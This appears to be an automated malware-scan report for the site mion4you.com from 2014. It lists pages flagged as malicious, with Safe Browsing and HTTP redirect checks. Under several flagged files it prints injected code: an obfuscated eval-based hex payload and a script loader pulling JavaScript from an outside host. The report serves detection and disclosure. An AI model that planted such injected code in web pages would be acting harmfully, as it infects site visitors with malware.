Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mion4you.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mion4you.com/ | 200 OK Content-Length: 70678 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d,t){ var url="http://init.phpwind.net/init.php?sitehash=10AF8IAgJdAgAGVAUKVwUDAlYEUlINAgMGAVdQAFRUBlM&v=8.7&c=0"; var g=d.createElement(t);g.async=1;g.src=url;d.body.appendChild(g)}(document,"script")); Antivirus reports:
| ||
http://mion4you.com/js/core/core.js | 200 OK Content-Length: 27758 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_81_79_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_81_79_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_79_68_6a_6c_77_79_35_75_73_36_79_6c_73_35_77_6f_77_2e_42_14_11_27_81_79_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68 Antivirus reports:
| ||
http://mion4you.com/js/pw_ajax.js | 200 OK Content-Length: 17309 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_81_79_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_81_79_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_79_68_6a_6c_77_79_35_75_73_36_79_6c_73_35_77_6f_77_2e_42_14_11_27_81_79_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68 Antivirus reports:
| ||
http://mion4you.com/mode/area/js/ddsliderplayer.js | 200 OK Content-Length: 6712 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_81_79_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_81_79_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_79_68_6a_6c_77_79_35_75_73_36_79_6c_73_35_77_6f_77_2e_42_14_11_27_81_79_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68 Antivirus reports:
| ||
http://mion4you.com/js/Deploy.js | 200 OK Content-Length: 6280 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_81_79_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_81_79_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_79_68_6a_6c_77_79_35_75_73_36_79_6c_73_35_77_6f_77_2e_42_14_11_27_81_79_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68 Antivirus reports:
| ||
http://mion4you.com/js/global.js | 200 OK Content-Length: 4430 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_81_79_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_81_79_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_79_68_6a_6c_77_79_35_75_73_36_79_6c_73_35_77_6f_77_2e_42_14_11_27_81_79_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68 Antivirus reports:
| ||
http://mion4you.com/mode/area/js/adminview.js | 200 OK Content-Length: 16910 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_81_79_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_81_79_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_79_68_6a_6c_77_79_35_75_73_36_79_6c_73_35_77_6f_77_2e_42_14_11_27_81_79_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68 Antivirus reports:
| ||
http://mion4you.com/js/app_global.js | 200 OK Content-Length: 11940 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_81_79_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_81_79_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_79_68_6a_6c_77_79_35_75_73_36_79_6c_73_35_77_6f_77_2e_42_14_11_27_81_79_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68 Antivirus reports:
| ||
http://mion4you.com/login.php | 200 OK Content-Length: 30067 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d,t){ var url="http://init.phpwind.net/init.php?sitehash=10AF8IAgJdAgAGVAUKVwUDAlYEUlINAgMGAVdQAFRUBlM&v=8.7&c=0"; var g=d.createElement(t);g.async=1;g.src=url;d.body.appendChild(g)}(document,"script")); Antivirus reports:
| ||
http://mion4you.com/js/pw_authcode.js | 200 OK Content-Length: 8290 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_81_79_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_81_79_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_79_68_6a_6c_77_79_35_75_73_36_79_6c_73_35_77_6f_77_2e_42_14_11_27_81_79_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68 Antivirus reports:
| ||
http://mion4you.com/sendpwd.php | 200 OK Content-Length: 28226 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d,t){ var url="http://init.phpwind.net/init.php?sitehash=10AF8IAgJdAgAGVAUKVwUDAlYEUlINAgMGAVdQAFRUBlM&v=8.7&c=0"; var g=d.createElement(t);g.async=1;g.src=url;d.body.appendChild(g)}(document,"script")); Antivirus reports:
| ||
http://mion4you.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://mion4you.com/register.php | 200 OK Content-Length: 26805 Content-Type: text/html | clean |
http://mion4you.com/sonicradio/index.php | 200 OK Content-Length: 3724 Content-Type: text/html | clean |
http://mion4you.com/sonicradio/template/flashobject.js | 404 Not Found Content-Length: 351 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mion4you.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Apr 2014 02:36:14 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Set-Cookie: 6bc78_lastvisit=0%091396838174%09%2Findex.php; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
Set-Cookie: 6bc78_lastpos=index; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
Set-Cookie: 6bc78_lastvisit=0%091396838174%09%2Findex.php; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
Set-Cookie: 6bc78_oltoken=init; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
Set-Cookie: 6bc78_online_info=1396838174%093%099; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
Set-Cookie: 6bc78_ci=index%091396838174%09%09; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: mion4you.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Apr 2014 02:36:14 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Set-Cookie: 6bc78_lastvisit=0%091396838174%09%2Findex.php; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
Set-Cookie: 6bc78_lastpos=index; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
Set-Cookie: 6bc78_lastvisit=0%091396838174%09%2Findex.php; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
Set-Cookie: 6bc78_oltoken=init; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
Set-Cookie: 6bc78_online_info=1396838174%093%099; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
Set-Cookie: 6bc78_ci=index%091396838174%09%09; expires=Tue, 07-Apr-2015 02:36:14 GMT; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: mion4you.com
Referer: http://www.google.com/search?q=mion4you.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mion4you.com
Referer: http://www.google.com/search?q=mion4you.com
Result:
The result is similar to the first query. There are no suspicious redirects found.